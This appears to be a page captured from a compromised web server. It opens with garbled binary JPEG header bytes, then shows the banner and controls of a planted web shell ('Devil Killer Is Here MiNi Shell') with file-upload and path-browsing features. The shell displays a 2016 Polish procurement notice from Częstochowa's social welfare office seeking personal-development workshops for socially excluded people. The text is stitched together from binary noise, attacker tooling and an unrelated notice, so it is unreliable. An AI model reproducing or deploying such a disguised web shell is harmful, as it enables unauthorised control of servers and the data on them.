JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160621/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160621/95885-N-2016.html

<p class="kh_header"><b>Częstochowa: Warsztaty rozwoju osobistego dla uczestników projektu pozakonkursowego pn. Zmieniając dziś, projektujesz lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Osi Priorytetowej IX Włączenie społeczne, Działania 9.1 Aktywna integracja, Poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy (część 2)</b><br>
<b>Numer ogłoszenia: 95885 - 2016; data zamieszczenia: 21.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Polskiej Organizacji Wojskowej 2, 42-217 Częstochowa, woj. śląskie, tel. 34 37 24 200, faks 34 37 24 250.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Warsztaty rozwoju osobistego dla uczestników projektu pozakonkursowego pn. Zmieniając dziś, projektujesz lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Osi Priorytetowej IX Włączenie społeczne, Działania 9.1 Aktywna integracja, Poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy (część 2).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest organizacja i przeprowadzenie warsztatów rozwoju osobistego dla uczestników projektu pozakonkursowego pn. Zmieniając dziś, projektujesz lepsze jutro w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego realizowanego przez Miejski Ośrodek Pomocy Społecznej w Częstochowie, w podziale na 4 części, z których każda może być przedmiotem oferty częściowej: 1)Trening ekonomii gospodarstwa domowego oraz zasad prowadzenia budżetu domowego; 2)Trening efektywnego zarządzania sobą w czasie; 3)Warsztaty samodzielnego załatwiania spraw urzędowych; 4)Warsztaty porządkowania przestrzeni wokół siebie - czyli jak dbać o ład i porządek najbliższego otoczenia. 2.Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 do SIWZ. 3.Warsztaty odbywać się będą w formie zajęć stacjonarnych na terenie Gminy Miasta Częstochowy. 4.Projekt skierowany jest do osób zagrożonych wykluczeniem społecznym, szczególnie tych najbardziej oddalonych od rynku pracy, zmagających się z wieloma, często sprzężonymi problemami natury psychologicznej, społecznej i ekonomicznej. Uczestnikami projektu są osoby korzystające ze świadczeń pomocy społecznej, bezrobotne, bezdomne, niepełnosprawne, nieporadne życiowo. 5.Zajęcia będą odbywały się w dni robocze od poniedziałku do piątku, w przedziale czasowym pomiędzy godziną 9:00 a 18:00. 6.Przedmiot zamówienia realizowany będzie na podstawie szczegółowego programu zajęć, zgodnie z harmonogramem zajęć przedłożonym przez Wykonawcę w terminie nieprzekraczającym 3 dni roboczych przed planowaną datą ich rozpoczęcia. Harmonogram powinien zawierać m. in.: miejsce realizacji (dokładny adres), nazwa zajęć, czas trwania i sposób organizacji zajęć, cel zajęć, plan zajęć zawierający nazwę zajęć oraz ich wymiar zgodny z zamówieniem. Harmonogram zajęć przedstawiony przez Wykonawcę wymaga akceptacji Zamawiającego. 7.Wykonawca zobowiązany jest zapewnić lokal dla potrzeb realizacji zamówienia, usytuowany na obszarze administracyjnym jednej z dzielnic miasta Częstochowy: Śródmieście, Podjasnogórska, Trzech Wieszczów, Stare Miasto; o łatwym dostępie do środków komunikacji miejskiej (maksymalna odległość od przystanku MPK nie może być dłuższa niż 0,5 km). Ponadto lokal, w którym będą odbywały się zajęcia, musi posiadać dostęp do pomieszczeń sanitarnych, spełniać wymogi bezpieczeństwa i higieny pracy oraz przepisy p. poż. Ze względu na specyfikę projektu, Zamawiający preferuje lokal, w którym zniesione zostały bariery architektonicznych, tj. posiadający udogodnienia oraz dodatkowe rozwiązania dla osób niepełnosprawnych. 8.Wykonawca zobowiązany jest do zapewnienia uczestnikom wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia warsztatów oraz przekazania jednego dodatkowego egzemplarza materiałów szkoleniowych do dokumentacji projektu. Materiały szkoleniowe zostaną wydane uczestnikom na własność. Zawierać będą materiały w formie papierowej, złożone  w oddzielne komplety - (w teczce z gumką) oraz z długopisem typu zenit, a także notatnikiem A-5 (min. 16 kartek). 9.Wykonawca zapewni każdego dnia warsztatowego dla wszystkich uczestników dostęp do serwisu kawowego (dobrej jakości kawa, herbata) oraz poczęstunek w formie paluszków słonych, kruchych ciastek (min 50 g na osobę) i zimnych napojów (wody mineralnej i soków) w ilości 0,5 l na osobę. Dostęp do kawy, herbaty i drobnych przekąsek będzie możliwy stale podczas trwania zajęć warsztatowych, tj. w miejscu realizacji zajęć. Do przygotowywania kawy i herbaty uczestnicy muszą mieć zapewnione łyżeczki oraz filiżanki lub kubki jednorazowe przystosowane do napojów gorących.
10.Wykonawca zobowiązany jest do ubezpieczenia NNW, każdego uczestnika warsztatów podczas zajęć na kwotę 10 000,00 zł/1 osobę. Wykonawca powinien dostarczyć Zamawiającemu do 3 dni przed rozpoczęciem warsztatów (np. faksem) potwierdzenie ubezpieczenia NNW uczestników.
11.Pozostałe obowiązki Wykonawcy: 1)oznakowanie logiem projektu wraz z informacją o współfinansowaniu ze środków Europejskiego Funduszu Społecznego pomieszczeń, w których będą odbywały się zajęcia; 2)przygotowanie i prowadzenie w wersji papierowej dokumentacji zajęć, w tym listy obecności wraz z zakresem godzinowym, z zamieszczoną informacją, że projekt realizowany jest ze środków Europejskiego Funduszu Społecznego oraz z logotypami zgodnie z Wytycznymi dotyczącymi oznaczania projektów ramach EFRR, EFS oraz FS na lata 2014 - 2020; 3)wystawienie uczestnikom zaświadczeń potwierdzających udział w warsztatach rozwoju osobistego - zgodnie z zakresem tematycznym prowadzonych zajęć. Na zaświadczeniach należy umieścić informację, iż usługa przeprowadzona była w ramach realizacji projektu pn.: Zmieniając dziś, projektujesz lepsze jutro współfinansowanego ze środków Europejskiego Funduszu Społecznego oraz logotypy zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach EFRR, EFS oraz FS na lata 2014 - 2020; 4)przedstawienie Zamawiającemu po zakończeniu zajęć pełnej dokumentacji wykonanej usługi, na którą złożą się: listy obecności, kopie zaświadczeń oraz kserokopię ubezpieczenia NNW uczestników. 12.Wszystkie działania informacyjne i promocyjne związane z projektem powinny zostać udokumentowane (obligatoryjna dokumentacja fotograficzna). Dokumentacja ta powinna być przechowywana z pozostałymi dokumentami dotyczącymi warsztatów przez cały okres trwałości projektu oraz może zostać poddana kontroli. Dokumentacja może być przechowywana w formie papierowej albo elektronicznej. 13.Zamawiający zastrzega sobie prawo do przeprowadzenia kontroli w zakresie prowadzenia przez Wykonawcę dokumentacji dotyczącej realizacji niniejszej umowy do końca 2019 r. 14.Informacje dodatkowe (dotyczy wykonawców stanowiących personel projektu): 1)Wykonawca zobowiązany jest do przedłożenia Zamawiającemu oświadczenia o braku podwójnego finansowania. Wzór (załącznik nr 11 do SIWZ) zostanie przekazany Wykonawcy po podpisaniu umowy; 2)Zgodnie z Wytycznymi w zakresie kwalifikowania wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014 - 2020 z dnia 10.04.2015 r., w przypadku angażowania osoby jako personel projektu cyt.: wydatki związane z zaangażowaniem osoby wykonującej zadania w projekcie lub w projektach są kwalifikowalne, o ile: a)obciążenie z tego wynikające, nie wyklucza możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych danej osobie; b)łączne zaangażowanie zawodowe tej osoby w realizację wszystkich projektów finansowanych z funduszy strukturalnych i Funduszu Spójności oraz działań finansowanych z innych źródeł, w tym środków własnych Beneficjenta i innych podmiotów, nie przekracza 276 godzin miesięcznie. Beneficjent weryfikuje spełnienie warunków, o których mowa w lit. a i b, przed zaangażowaniem osoby do projektu i zobowiązuje ją do spełnienia tych warunków w okresie kwalifikowania jej wynagrodzenia w tym projekcie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności gospodarczej jest krótszy - w tym okresie, wykonał bądź wykonuje co najmniej 1 usługę o tematyce tożsamej z przedmiotem zamówienia lub podobnej, o wartości nie mniejszej niż 10 000,00 zł brutto, z podaniem jej wartości, przedmiotu, daty wykonania (załącznik nr 4 do SIWZ) oraz załączeniem dokumentów potwierdzających, że usługa te została wykonana należycie (tzw. list referencyjny lub inny dokument potwierdzający, iż usługa została wykonana należycie), z zastrzeżeniem, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. UWAGA! (1)Pod pojęciem usług o tematyce tożsamej z przedmiotem zamówienia lub podobnej Zamawiający rozumie usługi zrealizowane na podstawie odrębnych umów, zleceń które w swym programie miały zajęcia-warsztaty z zakresu rozwoju osobistego; (2)Dla spełnienia warunku wiedzy i doświadczenia, Wykonawca musi wykazać co najmniej 1 usługę niezależnie od tego, ilu części zamówienia dotyczy oferta.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg formuły spełnia / nie spełnia na podstawie przedstawionego przez Wykonawcę oświadczenia o dysponowaniu lokalem, stanowiącego załącznik nr 5 do SIWZ, odrębnie dla każdej z części zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg formuły spełnia / nie spełnia na podstawie przedstawionego przez Wykonawcę wykazu osób potwierdzającego, że każda z osób, które będą uczestniczyć w wykonywaniu zamówienia posiada wymagane uprawnienia - załącznik nr 6 do SIWZ. Zamawiający wymaga minimalnie: a)dla części nr 1:  co najmniej 1 trenera z wykształceniem wyższym oraz doświadczeniem w postaci przeprowadzenia min. 1000 godzin treningu z zakresu gospodarowania budżetem domowym (każdy z osobna), 1 osobę z ukończonymi studiami wyższymi na kierunku: oligofrenopedagogika oraz z min. 3-letnim doświadczeniem w pracy z osobami dorosłymi z niepełnosprawnością intelektualną; b)dla części 2: co najmniej 1 trenera z wykształceniem wyższym oraz doświadczeniem w postaci przeprowadzenia min. 1000 godzin warsztatów z zakresu efektywnego gospodarowania czasem (każdy z osobna), 1 osobę z ukończonymi studiami wyższymi na kierunku: oligofrenopedagogika oraz z min. 3-letnim doświadczeniem w pracy z osobami dorosłymi z niepełnosprawnością intelektualną; c)dla części 3: co najmniej 1 trenera z wykształceniem wyższym oraz doświadczeniem w postaci przeprowadzenia min. 1000 godzin zajęć z zakresu jednego z niżej wymienionych tematów: samodzielność, zaradność życiowa, umiejętności samoobsługowe (każdy z osobna), 1 osobę z ukończonymi studiami wyższymi na kierunku: oligofrenopedagogika oraz z min. 3-letnim doświadczeniem w pracy z osobami dorosłymi z niepełnosprawnością intelektualną; d)dla części 4: co najmniej 1 trenera z wykształceniem wyższym oraz doświadczeniem w postaci przeprowadzenia minimum 1000 godzin zajęć związanych z tematyką warsztatów (każdy z osobna), 1 osobę z ukończonymi studiami wyższymi na kierunku: oligofrenopedagogika oraz z min. 3-letnim doświadczeniem w pracy z osobami dorosłymi z niepełnosprawnością intelektualną;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych wymagań w tym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy (załącznik nr 1 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświadczenie Wykonawcy - 40</li>
<li>3 - Dostosowanie lokalu przeznaczonego do realizacji zajęć do potrzeb osób niepełnosprawnych - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień w zawartej umowie wprowadzonych aneksem takich jak: 1)zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy; 2)zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy; 3)zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych; 4)zmiana terminu realizacji zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych przez Zamawiającego lub Wykonawcę; 5)zmiana lub wycofanie podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego; 6)zmiana liczby uczestników warsztatów - zgodnie z limitem wskazanym w szczegółowym opisie przedmiotu zamówienia (załącznik nr 2 do SIWZ); 7)zmiana miejsca odbycia zajęć stacjonarnych z przyczyn obiektywnych zaakceptowanych przez Zamawiającego na miejsce i standard sali i lokalu o porównywalny z tym zaproponowanym w ofercie lub lepszy (w przypadku zmiany lokalu posiadającego udogodnienia dla osób niepełnosprawnych, zaproponowany przez Wykonawcę lokal zastępczy, musi posiadać te same udogodnienia co lokal wskazany w ofercie); 8)zmiana osób - kadry zapewnionej przez Wykonawcę na osoby o doświadczeniu nie mniejszym niż wymagane w SIWZ; 9)wprowadzenie informacji dodatkowych związanych z nowymi wytycznymi w realizacji Projektu; 10)w przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku VAT. 7.Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie Zamawiającego nie zaś jego obowiązek wprowadzenia takich zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://mops.bip.czestochowa.pl/?app=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Częstochowie ul. Polskiej Organizacji Wojskowej 2, 42-217 Częstochowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 13:00, miejsce: W siedzibie Zamawiającego w Częstochowie przy ul. Polskiej Organizacji Wojskowej 2 (Kancelaria - parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




